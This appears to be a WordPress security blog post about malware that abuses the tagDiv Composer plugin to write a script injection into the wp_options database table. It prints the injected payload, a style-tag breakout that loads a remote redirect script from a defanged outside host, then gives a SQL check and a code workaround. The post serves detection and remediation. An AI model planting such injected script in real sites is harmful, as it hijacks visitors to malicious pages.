A vulnerability in tagDiv Composer, a plugin included with the WordPress Newspaper theme, has been discovered that allows the database to be rewritten.


Characteristics of the malware

This malware writes the following string to the key td_live_css_local_storage in the wp_options table in the database.

*Some parts are enclosed in parentheses for safety.

a:2:{i:0;s:0:\"\";s:3:\"css\";s:175:\".stepkokkmnkivhrwppnn{} .step4636435346{}</style><script>var a=1;var b=2;var c=4;&lt ;/script><script src='https://four.startperfectsolutions[.]com/scripts/sold.js\'></script><style>\"}

This string is output to the site header and the site redirects (forces a move) to another site.

startperfectsolutions “.” com/scripts/sold.js part is the body of the malware that performs redirect hacks and other malicious behavior on the site. This script is loaded on the site and causes the malicious behavior.

How to deal with malware

This malware is a very rare type of malware that writes to the database.
The key td_live_css_local_storage is a key created by the tagDiv Composer plugin, so it probably exploits a vulnerability in this plugin.

[Free] WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].

However, there are various patterns of malware database modification, and if the pattern has not yet been added to our database, the plugin may not be able to detect it.

In this case, it is necessary to issue SQL statements directly to the database to check the malware infection status.

Example of SQL statement
select option_value from wp_options where option_name = 'td_live_css_local_storage';

Update or stop using tagDiv Composer

Since multiple vulnerabilities have been reported in tagDiv Composer, please consider stopping the use of tagDiv Composer if you are unable to update it.

The vulnerability mentioned above can be prevented by commenting out the part of the plugin that writes some settings to the database, as shown below, but this may limit the functionality of the plugin since the plugin settings cannot be saved.

File \wp-content\plugins\td-composer\css-live\includes\td_live_css_storage.php
*Adding // at the beginning of the line and commenting it out will prevent this code section from working and prevent the database from being rewritten.

//update_option('td_live_css_local_storage', self::$local_storage);

Related Posts:

  1. Change WordPress database prefix to prevent SQL injection
    You can reduce the chances of a successful SQL injection by changing the prefix of your WordPress database. We will explain how to do this....
  2. Serious Vulnerability in WordPress Jetpack Plugin
    A serious vulnerability has been discovered in the Jetpack plugin for WordPress and a version update has been distributed. This section explains how to deal with this vulnerability....
  3. Causes of images not displaying, menus not displaying, or layout collapsing after SSL conversion
    This section explains the causes and countermeasures for images not displaying, menus (animated child menus) not displaying, and layout collapsing due to style sheet loading failure after SSL conversion....
  4. WordPress malware Fake browser update page
    Recently there has been an increase in WordPress malware that displays a fake browser update page. We will explain this malware....
  5. What is the most common vulnerability cross-site scripting in WordPress?
    The most common vulnerability in WordPress is called Cross Site Scripting (XSS). We would like to explain about this vulnerability....
  6. How to check individual WordPress plugins for vulnerabilities
    It is said that 60% of WordPress hacks are program (theme or plugin) vulnerabilities. We will explain how to check for vulnerabilities in your plugins individually....